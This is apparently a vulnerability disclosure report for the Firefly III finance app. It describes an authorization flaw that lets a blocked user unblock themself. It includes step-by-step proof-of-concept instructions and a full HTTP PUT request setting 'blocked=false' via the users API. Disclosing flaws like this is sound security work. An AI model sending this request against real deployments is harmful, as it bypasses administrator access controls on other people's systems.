A User Can Unblock Themself in firefly-iii/firefly-iii
Valid
Reported on
Jan 13th 2023
Description
PUT /api/v1/users/{id} API doesn't properly check the authorizaion.
Proof of Concept
- [admin] Enable user registration functionality.
- [user] Register new user and login as them.
- [user] Create OAuth client.
- [admin] Block the new user on admin panel.
- [user] Send the following request:
PUT /api/v1/users/{id} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/vnd.api+json
Authorization: Bearer {JWT}
Cache-Control: no-cache
Host: localhost:8888
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 13
blocked=false
- [user] Login successfully.
Impact
If a user gets blocked, they can unblock themself.
We are processing your report and will contact the
firefly-iii
team within 24 hours.
4 months ago
We have contacted a member of the
firefly-iii
team and are waiting to hear back
4 months ago
The researcher's credibility has increased: +7
to join this conversation